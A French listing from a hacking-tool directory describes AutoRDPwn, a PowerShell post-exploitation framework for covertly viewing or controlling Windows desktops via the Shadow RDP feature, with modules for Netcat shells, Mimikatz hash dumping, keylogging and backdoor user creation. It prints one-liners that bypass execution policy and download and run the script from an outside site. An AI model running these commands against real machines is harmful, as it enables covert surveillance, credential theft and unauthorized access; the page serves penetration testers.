Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
AutoRDPwn — The Shadow Attack Framework | Kitploit
Outils/GitHubGitHub/joelgmsec/autordpwn
Cassage de Mots de PasseEscalade de PrivilègesGénération de PayloadsMouvement LatéralPost-ExploitationTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubjoelgmsec/autordpwn

AutoRDPwn

The Shadow Attack Framework

Voir le dépôt
1.1k499il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

AutoRDPwn

AutoRDPwn est un framework de post-exploitation créé en Powershell, conçu principalement pour automatiser l'attaque Shadow sur les ordinateurs Microsoft Windows. Cette vulnérabilité (listée comme une fonctionnalité par Microsoft) permet à un attaquant distant de visualiser le bureau de sa victime sans son consentement, et même de le contrôler à la demande, en utilisant des outils natifs du système d'exploitation lui-même.

Grâce aux modules supplémentaires, il est possible d'obtenir un shell distant via Netcat, de dumper les hashes du système avec Mimikatz, de charger un keylogger distant et bien plus encore. Le tout, via un menu totalement intuitif en sept langues différentes.

De plus, il est possible de l'utiliser dans un shell inversé via une série de paramètres décrits dans la section d'utilisation.

Prérequis

Powershell 4.0 ou supérieur

Changements

Version 5.1

• De nombreux bugs corrigés

• Améliorations esthétiques et temps d'attente améliorés

• Connexion Proxy-Aware via les paramètres système

• Il est désormais possible d'utiliser l'outil hors ligne en téléchargeant le fichier .zip

• Détection automatique de la langue en appuyant sur la touche Entrée

• Invoke-DCOM a été remplacé par SharpRDP

• PowerUp a été remplacé par Invoke-PrivescCheck

• Création de la sous-routine de nettoyage automatique chez la victime

• Nouveau module disponible : SMB Shell chiffré avec AES

• Nouveau module disponible : Changer d'utilisateur avec RunAs

*Le reste des changements peut être consulté dans le fichier CHANGELOG

Utilisation

Cette application peut être utilisée localement, à distance ou pour pivoter entre machines.

Lorsqu'elle est utilisée à distance dans un shell inversé, il est nécessaire d'utiliser les paramètres suivants :

Exécution locale en une ligne :

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Exemple d'exécution distante en une ligne :

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

Le guide détaillé d'utilisation se trouve au lien suivant :

https://darkbyte.net/autordpwn-la-guia-definitiva

Captures d'écran

AutoRDPwn1_en AutoRDPwn2_en

Licence

Ce projet est sous licence GNU 3.0 - voir le fichier LICENSE pour plus de détails.

Crédits et remerciements

Ce framework a été créé et conçu de A à Z par Joel Gámez Molina // @JoelGMSec

Certains modules utilisent du code, des scripts et des outils tiers, notamment :

• Chachi-Enumerator par Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m par Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp par Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash par Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz par Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec par Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper par Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP par Steven F --> https://github.com/0xthirteen/SharpRDP

Et bien d'autres, qui ne tiennent pas ici.. Merci à tous pour leur excellent travail.

Contact

Ce logiciel n'offre aucune garantie. Son utilisation est exclusive aux environnements éducatifs et/ou aux audits de sécurité avec le consentement correspondant du client. Je ne suis pas responsable de son utilisation abusive ni des éventuels dommages causés par celui-ci.

Pour plus d'informations, vous pouvez me trouver sur Twitter sous @JoelGMSec et sur mon blog darkbyte.net.

Support

Vous pouvez soutenir mon travail en m'offrant un café :

buymeacoffe

Télécharger l’outil
ParamètreDescription
-admin / -noadminSelon les permissions dont nous disposons, nous utiliserons l'un ou l'autre
-noguiCela évitera de charger le menu et certaines couleurs, garantissant sa fonctionnalité
-langNous choisirons notre langue (Anglais, Espagnol, Français, Allemand, Italien, Russe ou Portugais)
-optionComme avec le menu, nous pouvons choisir comment lancer l'attaque
-shadowNous déciderons si nous voulons voir ou contrôler l'appareil distant
-createuserCe paramètre est optionnel, l'utilisateur AutoRDPwn:AutoRDPwn sera créé sur la machine victime
-nocleanDésactive le processus d'annulation de toutes les modifications sur l'ordinateur victime